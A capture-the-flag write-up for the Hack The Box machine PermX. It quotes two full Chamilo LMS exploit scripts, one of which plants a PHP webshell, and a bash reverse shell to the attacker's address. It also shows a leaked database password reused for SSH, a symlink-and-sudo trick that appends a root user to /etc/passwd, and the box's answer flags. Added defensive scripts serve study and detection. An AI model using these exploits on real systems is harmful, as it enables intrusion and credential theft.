HTB:PermX[WriteUP]

Contents

Connect to the HTB server and start the target machine

[1.How many TCP ports are listening on PermX?](#1.How many TCP ports are listening on PermX?)

Scan the target's TCP ports with nmap

[2.What is the default domain name used by the web server on the box?](#2.What is the default domain name used by the web server on the box?)

Access port 80 on the target with curl

[3.On what subdomain of permx.htb is there an online learning platform?](#3.On what subdomain of permx.htb is there an online learning platform?)

Fuzz subdomains of the domain with ffuf

Open the subdomain directly in a browser

[4.What is the name of the application running on lms.permx.htb?](#4.What is the name of the application running on lms.permx.htb?)

Inspect the site's technology stack with Wappalyzer

[5.What version of Chamilo is running on PermX?](#5.What version of Chamilo is running on PermX?)

Fuzz paths on the subdomain with ffuf

Open robots.txt on the subdomain in a browser

[6.What is the name of the 2023 CVE ID for a stored cross-site scripting vulnerability that leads to remote code execution?](#6.What is the name of the 2023 CVE ID for a stored cross-site scripting vulnerability that leads to remote code execution?)

Start Metasploit

Search CVE.MITRE.ORG for vulnerabilities in this CMS

[7.What user is the webserver running as on PermX?](#7.What user is the webserver running as on PermX?)

[8.What is the full path to the file that holds configuration data to include the database connection information for Chamilo?](#8.What is the full path to the file that holds configuration data to include the database connection information for Chamilo?)

Start an nc listener on the attacking machine

[9.Submit the flag located in the mtz user's home directory.](#9.Submit the flag located in the mtz user's home directory.)

USER_FLAG:7239022c6248c28ed2945734c9e07ac9

[10.What is the full path to the script that the mtz user can run as any user without a password?](#10.What is the full path to the script that the mtz user can run as any user without a password?)

[11./opt/acl.sh allow for changing the access control list on file in what directory? (Don't include the trailing / on the directory.)](#11./opt/acl.sh allow for changing the access control list on file in what directory? (Don't include the trailing / on the directory.))

[12.Does setfacl follow symbolic links by default?(YES)](#12.Does setfacl follow symbolic links by default?(YES))

[13.Submit the flag located in the root user's home directory.](#13.Submit the flag located in the root user's home directory.)

ROOT_FLAG:86f2867102ba7ec4855205a4f2096539


Connect to the HTB server and start the target machine

Target IP: 10.10.11.23

Assigned IP: 10.10.14.12


1.How many TCP ports are listening on PermX?

Scan the target's TCP ports with nmap

nmap -p- --min-rate=1500 -T5 -sS -Pn 10.10.11.23

The scan shows two open ports on the target: 22 and 80.


2.What is the default domain name used by the web server on the box?

Access port 80 on the target with curl

curl -I 10.10.11.23:80

┌──(root㉿kali)-[/home/kali/Desktop/temp]

└─# curl -I 10.10.11.23:80

HTTP/1.1 302 Found

Date: Mon, 04 Nov 2024 00:32:59 GMT

Server: Apache/2.4.52 (Ubuntu)

Location: http://permx.htb

Content-Type: text/html; charset=iso-8859-1

The output shows that accessing the target IP directly redirects to permx.htb.


3.On what subdomain of permx.htb is there an online learning platform?

Map the domain name to the target IP

echo '10.10.11.23 permx.htb' >> /etc/hosts

Fuzz subdomains of the domain with ffuf (responses with the 302 redirect are filtered out)

ffuf -u http://permx.htb -H 'Host: FUZZ.permx.htb' -w ../dictionary/subdomains-top1mil-5000.txt -fc 302

Map the discovered subdomain to the target IP as well

echo '10.10.11.23 lms.permx.htb' >> /etc/hosts

Open the subdomain directly in a browser

Searching for Chamilo shows that the subdomain lms.permx.htb hosts an online learning platform.


4.What is the name of the application running on lms.permx.htb?

Inspect the site's technology stack with Wappalyzer

The web application serving this page is Chamilo (a CMS).


5.What version of Chamilo is running on PermX?

Fuzz paths on the subdomain with ffuf

ffuf -u http://lms.permx.htb/FUZZ -w ../dictionary/common.txt

Open robots.txt on the subdomain in a browser

Browse into the documentation directory

The page title shows that the CMS version is 1.11.


6.What is the name of the 2023 CVE ID for a stored cross-site scripting vulnerability that leads to remote code execution?

Search for known exploits against this CMS

searchsploit Chamilo

Copy the RCE-related exploit to the current directory

searchsploit -m 49867.py

View the exploit code

cat 49867.py 

# Exploit Title: Chamilo LMS 1.11.14 - Remote Code Execution (Authenticated)
# Date: 13/05/2021
# Exploit Author: M. Cory Billington (@_th3y)
# Vendor Homepage: https://chamilo.org
# Software Link: https://github.com/chamilo/chamilo-lms
# Version: 1.11.14
# Tested on: Ubuntu 20.04.2 LTS
# CVE: CVE-2021-31933
# Writeup: https://theyhack.me/CVE-2021-31933-Chamilo-File-Upload-RCE/

from requests import Session
from random import choice
from string import ascii_lowercase

import requests

# This is all configuration stuff,
url = "http://127.0.0.1/chamilo-lms/"  # URL to remote host web root
user_name = "admin"  # User must be an administrator
password = "admin"
command = "id;whoami"

# Where you want to upload your webshell. Must be writable by web server user.
# This spot isn't protected by .htaccess
webshell_path = 'web/'
webshell_name = f"shell-{''.join(choice(ascii_lowercase) for _ in range(6))}.phar" # Just a random name for webshell file
content = f"<?php echo `{command}`; ?>"

def main():
    # Run a context manager with a session object to hold login session after login
    with Session() as s:
        login_url = f"{url}index.php"
        login_data = {
            "login": user_name,
            "password": password
        }
        r = s.post(login_url, data=login_data) # login request

        # Check to see if login as admin user was successful.
        if "admin" not in r.url:
            print(f"[-] Login as {user_name} failed. Need to be admin")
            return
        print(f"[+] Logged in as {user_name}")
        print(f"[+] Cookie: {s.cookies}")
        file_upload_url = f"{url}main/upload/upload.php"
        # The 'curdirpath' is not sanitized, so I traverse to the '/var/www/html/chamilo-lms/web/build' directory. I can upload to /tmp/ as well
        php_webshell_file = {
            "curdirpath": (None, f"/../../../../../../../../../var/www/html/chamilo-lms/{webshell_path}"),
            "user_upload": (webshell_name, content)
            }

        ## Good command if you want to see what the request looks like without sending
        # print(requests.Request('POST', file_upload_url, files=php_webshell_file).prepare().body.decode('ascii'))

        # Two requests required to actually upload the file
        for i in range(2):
            s.post(file_upload_url, files=php_webshell_file)

        exploit_request_url = f"{url}{webshell_path}{webshell_name}"
        print("[+] Upload complete!")
        print(f"[+] Webshell: {exploit_request_url}")

        # This is a GET request to the new webshell to trigger code execution
        command_output = s.get(exploit_request_url)
        print("[+] Command output:\n")
        print(command_output.text)



if __name__ == "__main__":
    main()

The exploit header shows that it targets CVE-2021-31933, which is not the 2023 vulnerability we are looking for.

Start Metasploit

msfconsole

Search for Chamilo-related modules

search Chamilo

This module needs no authentication and achieves RCE through direct code injection; switch to it

use exploit/linux/http/chamilo_unauth_rce_cve_2023_34960

View the module information

info

The module description shows that it is based on CVE-2023-34960.

Submitting that as the answer turned out to be wrong; the question asks specifically for a stored XSS vulnerability.

Search CVE.MITRE.ORG for vulnerabilities in this CMS

Search for "stored cross-site"

This vulnerability allows an unauthenticated file upload that can execute JavaScript or plant a webshell: CVE-2023-4220


7.What user is the webserver running as on PermX?

I went straight to GitHub to look for an exploit for this vulnerability

#!/usr/bin/env python3
# -*- coding: UTF-8 -*-

# Name       : CVE-2023-4220
# Author     : Insomnia (Jacob S.)
# IG         : insomnia.py
# X          : @insomniadev_
# Yt         : insomnia-dev
# Github     : https://github.com/insomnia-jacob
# Description: Automation of RCE in Chamilo LMS on affected versions of CVE-2023-4220 through a web shell

import argparse
import requests
import time
from os import system
import io


# Colors
red = '\033[31m'
green = '\033[32m'
blue = '\033[34m'
yellow = '\033[93m'
reset = '\033[0m'


def arguments():
    global args
    parser = argparse.ArgumentParser()
    parser.add_argument('-t', '--target', required=True, help='Enter the target domain, for example: http://example.com')
    args = parser.parse_args()


def check_url_exists(url):
    print(blue,'\n\n[+]', reset, 'Checking if it is vulnerable.')
    
    try:
        response = requests.head(url + '/main/inc/lib/javascript/bigupload/files', allow_redirects=True)
        if response.status_code == 200:
            is_vuln()
            
            try:

                response2 = requests.head(url + '/main/inc/lib/javascript/bigupload/files/insomnia.php', allow_redirects=True)
                if response2.status_code == 200:
                    print(f'Success! open in browser: {url}/main/inc/lib/javascript/bigupload/files/insomnia.php')
                else:
                    upload_file(args.target)
            except requests.RequestException as e:
                print(red,f"[x] Error checking the URL: {e}")
                return False


        else:
            print(f'Error {url}')
    except requests.RequestException as e:
        print(red,f"[x] Error checking the URL: {e}")
        return False


def upload_file(url):
    new_url = url + '/main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported'
    insomnia_php = """
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
    if(isset($_GET['cmd']))
    {
        system($_GET['cmd'] . ' 2>&1');
    }
?>
</pre>
</body>
</html>
"""
    file_like_object = io.BytesIO(insomnia_php.encode('utf-8'))
    file_like_object.name = 'insomnia.php'  
    files = {'bigUploadFile': file_like_object}
    response3 = requests.post(new_url, files=files)
    print(response3.status_code)
    print(f'Success! open in browser: {url}/main/inc/lib/javascript/bigupload/files/insomnia.php')


def is_vuln():
    print(red,'''
███████████████████████████
███████▀▀▀░░░░░░░▀▀▀███████
████▀░░░░░░░░░░░░░░░░░▀████
███│░░░░░░░░░░░░░░░░░░░│███
██▌│░░░░░░░░░░░░░░░░░░░│▐██
██░└┐░░░░░░░░░░░░░░░░░┌┘░██
██░░└┐░░░░░░░░░░░░░░░┌┘░░██     [*] "It is vulnerable!"
██░░┌┘▄▄▄▄▄░░░░░▄▄▄▄▄└┐░░██
██▌░│██████▌░░░▐██████│░▐██     [*] "It is vulnerable!"
███░│▐███▀▀░░▄░░▀▀███▌│░███
██▀─┘░░░░░░░▐█▌░░░░░░░└─▀██     [*] "It is vulnerable!"
██▄░░░▄▄▄▓░░▀█▀░░▓▄▄▄░░░▄██
████▄─┘██▌░░░░░░░▐██└─▄████     [*] "It is vulnerable!"
█████░░▐█─┬┬┬┬┬┬┬─█▌░░█████
████▌░░░▀┬┼┼┼┼┼┼┼┬▀░░░▐████
█████▄░░░└┴┴┴┴┴┴┴┘░░░▄█████
███████▄░░░░░░░░░░░▄███████
██████████▄▄▄▄▄▄▄██████████
███████████████████████████
''', reset)    


def target(url):
    print(blue ,f'             URL: {url}')
    time.sleep(3)
    system("clear")    

def banner():
    textBanner = rf"""
 / __)/ )( \(  __)___(___ \ /  \(___ \( __ \ ___  / _ \(___ \(___ \ /  \ 
( (__ \ \/ / ) _)(___)/ __/(  0 )/ __/ (__ ((___)(__  ( / __/ / __/(  0 )
 \___) \__/ (____)   (____) \__/(____)(____/       (__/(____)(____) \__/ 
"""
    print(green,textBanner)
    print(yellow,'                                                                            by Insomnia (Jacob S.)')


def main():
    arguments()
    banner()
    target(args.target)
    check_url_exists(args.target)
    

if __name__ == '__main__':
    main()

Run the exploit directly against the target

python exploit.py -t http://lms.permx.htb/

Open the URL the exploit prints and run the whoami command

The output shows that the current user is www-data.
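The exploit above needs two kinds of request that an unauthenticated client must send: a POST to bigUpload.php with action=post-unsupported, and then a request for the uploaded .php file under bigupload/files/. Both are visible in the Apache access log. The script below is an added defender-side example, not part of this write-up or of either exploit; the log lines it processes are constructed to mirror this section's traffic (timestamps, byte counts and the second client address are made up), it assumes Apache's default combined log format, and the function and file names are my own.

```shell
#!/bin/sh
# Added example (not from the write-up or the exploits): flag CVE-2023-4220
# abuse patterns in an Apache access log in the default "combined" format,
# where $1 is the client address, $6 the quoted method ("POST) and $7 the path.

# write_sample_log <file>
# Constructed log mirroring the traffic from this section; the timestamps,
# byte counts and the 10.10.14.50 client are made up for the example.
write_sample_log() {
    cat > "$1" <<'EOF'
10.10.14.12 - - [04/Nov/2024:00:40:01 +0000] "POST /main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported HTTP/1.1" 200 12 "-" "python-requests/2.31.0"
10.10.14.12 - - [04/Nov/2024:00:40:05 +0000] "GET /main/inc/lib/javascript/bigupload/files/insomnia.php?cmd=whoami HTTP/1.1" 200 345 "-" "Mozilla/5.0"
10.10.14.50 - - [04/Nov/2024:00:41:00 +0000] "GET /main/inc/lib/javascript/bigupload/js/bigUpload.js HTTP/1.1" 200 9876 "-" "Mozilla/5.0"
10.10.14.50 - - [04/Nov/2024:00:41:02 +0000] "GET /index.php HTTP/1.1" 200 4321 "-" "Mozilla/5.0"
10.10.14.50 - - [04/Nov/2024:00:41:09 +0000] "POST /main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post HTTP/1.1" 403 0 "-" "Mozilla/5.0"
EOF
}

# detect_bigupload_abuse <logfile>
# Prints one line per suspicious request, "<tag> <client> <path>":
#   UPLOAD   - POST to the unauthenticated upload action
#   WEBSHELL - any request for a server-side script under bigupload/files/
# Exit status 0 when something was flagged, 1 when the log is clean.
detect_bigupload_abuse() {
    awk '
        $6 == "\"POST" && $7 ~ "bigupload/inc/bigUpload[.]php[?].*action=post-unsupported" {
            print "UPLOAD " $1 " " $7; found = 1; next
        }
        $7 ~ "bigupload/files/[^/?]+[.]ph(p|ar|tml)" {
            print "WEBSHELL " $1 " " $7; found = 1
        }
        END { exit found ? 0 : 1 }
    ' "$1"
}

# Stand-alone use: sh detect.sh /var/log/apache2/access.log
# With no argument the constructed sample log is scanned instead.
if [ "$#" -ge 1 ]; then
    detect_bigupload_abuse "$1"
else
    tmp=$(mktemp)
    write_sample_log "$tmp"
    detect_bigupload_abuse "$tmp"
    rm -f "$tmp"
fi
```

On the sample log only the two 10.10.14.12 requests are reported: the legitimate bigUpload.js fetch and the rejected action=post upload from the other client are left alone. The WEBSHELL rule matches any script extension under files/, since a patched Chamilo should never serve PHP from that directory at all.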


8.What is the full path to the file that holds configuration data to include the database connection information for Chamilo?

Start an nc listener on the attacking machine

nc -lvnp 1425

Spawn a reverse shell through the webshell the exploit uploaded

bash -c 'bash -i >& /dev/tcp/10.10.14.12/1425 0>&1'

┌──(root㉿kali)-[/home/kali/Desktop/temp]

└─# nc -lvnp 1425

listening on [any] 1425 ...

connect to [10.10.14.12] from (UNKNOWN) [10.10.11.23] 53550

bash: cannot set terminal process group (1173): Inappropriate ioctl for device

bash: no job control in this shell

www-data@permx:/var/www/chamilo/main/inc/lib/javascript/bigupload/files$ whoami

www-data

Upgrade to a proper TTY

script -c /bin/bash -q /dev/null

Find all likely configuration files under the web application and save the list

find /var/www/chamilo -name 'conf*' -type f 2>/dev/null | tee res.txt

Go through each file and grep for the string "password"

cat res.txt | xargs -I {} sh -c 'cat {} | grep "password"'

Find which file the value 03F6lY3uXAP2bkW8 came from

xargs -I {} sh -c 'grep -m1 "03F6lY3uXAP2bkW8" "{}" && echo "Found in {}"' < res.txt

www-data@permx:/var/www/chamilo$ xargs -I {} sh -c 'grep -m1 "03F6lY3uXAP2bkW8" "{}" && echo "Found in {}"' < res.txt

$_configuration['db_password'] = '03F6lY3uXAP2bkW8';

Found in /var/www/chamilo/app/config/configuration.php

Show the matching line in that file with 5 lines of context on each side

grep -C 5 '03F6lY3uXAP2bkW8' /var/www/chamilo/app/config/configuration.php

www-data@permx:/var/www/chamilo$ grep -C 5 '03F6lY3uXAP2bkW8' /var/www/chamilo/app/config/configuration.php

// Database connection settings.

$_configuration['db_host'] = 'localhost';

$_configuration['db_port'] = '3306';

$_configuration['main_database'] = 'chamilo';

$_configuration['db_user'] = 'chamilo';

$_configuration['db_password'] = '03F6lY3uXAP2bkW8';

// Enable access to database management for platform admins.

$_configuration['db_manager_enabled'] = false;

/**

* Directory settings.

Account: chamilo

Password: 03F6lY3uXAP2bkW8

In summary, the file holding the database connection information is /var/www/chamilo/app/config/configuration.php.
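The hunt above (find for conf* files, then grep for password) is what an administrator can run proactively to catch credentials that the web server account can read. The script below is an added example, not from the write-up or from Chamilo; it reuses the same conf* name pattern, reports which key holds a secret-looking value without printing the value itself, and adds the check the write-up skips: whether the file is readable by group or world. The keyword list, function names and the sample files in the usage are my own assumptions.

```shell
#!/bin/sh
# Added example (not from the write-up or from Chamilo): audit a web root for
# configuration files that embed credentials, and report whether accounts other
# than the owner can read them. Reuses the 'conf*' name pattern from the hunt above.

# Key names that usually hold a secret (constructed list; extend as needed).
SECRET_KEYS='password|passwd|secret|api_key|token'

# file_mode <file>  ->  octal permission bits such as 644 (GNU stat, BSD fallback)
file_mode() {
    stat -c '%a' "$1" 2>/dev/null || stat -f '%Lp' "$1"
}

# secret_keys_in <file>
# Prints each distinct key in <file> that is assigned a non-empty quoted value
# and whose name contains one of SECRET_KEYS, e.g. db_password for
#   $_configuration['db_password'] = '...';
# The value itself is never printed.
secret_keys_in() {
    awk -v keys="$SECRET_KEYS" '
        {
            line = tolower($0)
            # key, optional closing quote/bracket, "=" or "=>", then a quoted non-empty value
            if (line ~ "[a-z_]*(" keys ")[a-z_]*[\047\"]?[]]?[ \t]*=>?[ \t]*[\047\"][^\047\"]+[\047\"]") {
                match(line, "[a-z_]*(" keys ")[a-z_]*")
                print substr(line, RSTART, RLENGTH)
            }
        }' "$1" | sort -u
}

# audit_config_secrets <webroot>
# Prints "<flag> <key> <file>" per secret-bearing key, where <flag> is
# WORLD-READABLE, GROUP-READABLE or owner-only based on the file's mode bits.
audit_config_secrets() {
    find "$1" -type f -name 'conf*' 2>/dev/null | sort | while IFS= read -r f; do
        secret_keys_in "$f" | while IFS= read -r key; do
            case "$(file_mode "$f")" in
                *[4567])      flag=WORLD-READABLE ;;
                *[4567][0-3]) flag=GROUP-READABLE ;;
                *)            flag=owner-only ;;
            esac
            printf '%s %s %s\n' "$flag" "$key" "$f"
        done
    done
}

# Stand-alone use: sh audit.sh /var/www/chamilo
if [ "$#" -ge 1 ]; then
    audit_config_secrets "$1"
fi
```

Run against a web root it lists every config file that carries a password-like key together with its exposure, which is the input for the two fixes that matter here: restricting the file to the owner and the web server group, and rotating any value that turns out to be reused elsewhere (the database password on this box doubles as an SSH credential).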


9.Submit the flag located in the mtz user's home directory.

List the users on the target that can log in

cat /etc/passwd

Try logging in to the target over SSH as that user

ssh mtz@10.10.11.23 

Locate user.txt and read it

mtz@permx:~$ find / -name 'user.txt' 2>/dev/null

/home/mtz/user.txt

mtz@permx:~$ cat /home/mtz/user.txt

7239022c6248c28ed2945734c9e07ac9

USER_FLAG:7239022c6248c28ed2945734c9e07ac9


10.What is the full path to the script that the mtz user can run as any user without a password?

Check which commands this user can run with elevated privileges without a password

sudo -l

mtz@permx:~$ sudo -l

Matching Defaults entries for mtz on permx:

env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User mtz may run the following commands on permx:

(ALL : ALL) NOPASSWD: /opt/acl.sh

The script /opt/acl.sh can be run with elevated privileges without a password.


11./opt/acl.sh allow for changing the access control list on file in what directory? (Don't include the trailing / on the directory.)

From the script's contents, it allows granting arbitrary permissions on any link under **/home/mtz**.


13.Submit the flag located in the root user's home directory.

Create a symbolic link named test that points at **/etc/passwd**

ln -s /etc/passwd /home/mtz/test

Use the **/opt/acl.sh** script to grant read/write permission on the **/home/mtz/test** link

sudo /opt/acl.sh mtz rw /home/mtz/test

mtz@permx:~$ ln -s /etc/passwd /home/mtz/test

mtz@permx:~$ ls

priv test user.txt

mtz@permx:~$ sudo /opt/acl.sh mtz rw /home/mtz/test

Write a new user entry through the **/home/mtz/test** link

echo '0dayhp::0:0:0dayhp:/root:/bin/bash' >> /home/mtz/test

Switch to the 0dayhp user's bash

su 0dayhp

Locate root.txt and read it

root@permx:/home/mtz# find / -name 'root.txt'

/root/root.txt

/var/www/chamilo/vendor/symfony/intl/Tests/Data/Bundle/Reader/Fixtures/txt/root.txt

root@permx:/home/mtz# cat /root/root.txt

86f2867102ba7ec4855205a4f2096539

ROOT_FLAG:86f2867102ba7ec4855205a4f2096539
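The escalation works because the helper accepts any path under /home/mtz while setfacl follows symbolic links by default (question 12), so the ACL lands on /etc/passwd rather than on the link. The page does not reproduce /opt/acl.sh, so the script below is an added hardened sketch and not the box's script; it assumes the argument order of the call above (user, perm, file) and the same /home/mtz restriction. It rejects symlinks outright, canonicalises the path before comparing it with the allowed directory, restricts the permission argument to plain r/w/x combinations, and passes -P to setfacl so a symlink argument is skipped even if the file is swapped between the check and the call.

```shell
#!/bin/sh
# Added example: a hardened variant of a sudo-exposed ACL helper. The box's real
# /opt/acl.sh is not reproduced on this page, so this is a sketch that assumes the
# argument order of the call above (<user> <perm> <file>) and the same /home/mtz
# restriction. ALLOWED_DIR is the tree the helper may touch; overridable for testing.
ALLOWED_DIR="${ALLOWED_DIR:-/home/mtz}"

# validate_perm <perm>: accept only plain r/w/x combinations such as r, rw, rwx,
# so the second argument cannot smuggle extra ACL entries into setfacl -m.
validate_perm() {
    case "$1" in
        r|w|x|rw|rx|wx|rwx) return 0 ;;
        *) echo "rejected: bad permission spec '$1'" >&2; return 1 ;;
    esac
}

# validate_target <path>
# 0 when <path> is a regular, non-symlink file whose canonical location lies
# inside ALLOWED_DIR; 1 otherwise, with the reason on stderr.
validate_target() {
    t="$1"
    # setfacl follows symbolic links by default, so a link inside the allowed tree
    # that points at /etc/passwd would otherwise receive the ACL change.
    if [ -L "$t" ]; then
        echo "rejected: $t is a symbolic link" >&2; return 1
    fi
    if [ ! -f "$t" ]; then
        echo "rejected: $t is not a regular file" >&2; return 1
    fi
    # Canonicalise both sides so '..' segments and symlinked parent directories
    # cannot escape the allowed tree.
    rt=$(readlink -f -- "$t") || return 1
    rb=$(readlink -f -- "$ALLOWED_DIR") || return 1
    case "$rt" in
        "$rb"/*) return 0 ;;
        *) echo "rejected: $rt is outside $rb" >&2; return 1 ;;
    esac
}

# apply_acl <user> <perm> <file>: the only place setfacl is invoked.
apply_acl() {
    validate_perm "$2" || return 1
    validate_target "$3" || return 1
    # -P (--physical) makes setfacl skip symlink arguments, which also covers the
    # target file being swapped for a link between the check above and this call.
    setfacl -P -m "u:$1:$2" "$3"
}

if [ "$#" -eq 3 ]; then
    apply_acl "$1" "$2" "$3"
    exit $?
fi
```

With this version the write-up's `sudo /opt/acl.sh mtz rw /home/mtz/test` stops at the symlink check, and a target reached through a symlinked parent directory is caught by the canonical-path comparison. A parent directory renamed into a symlink between the check and the call is not covered by -P; if such a helper must exist, operating only on paths whose parent directories are root-owned closes that, and accepting only $SUDO_USER as the user argument is a further tightening. Hard links are the remaining way to alias a file from outside the tree, and on Ubuntu fs.protected_hardlinks=1 is on by default, which stops an unprivileged user from hard-linking files they do not own.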
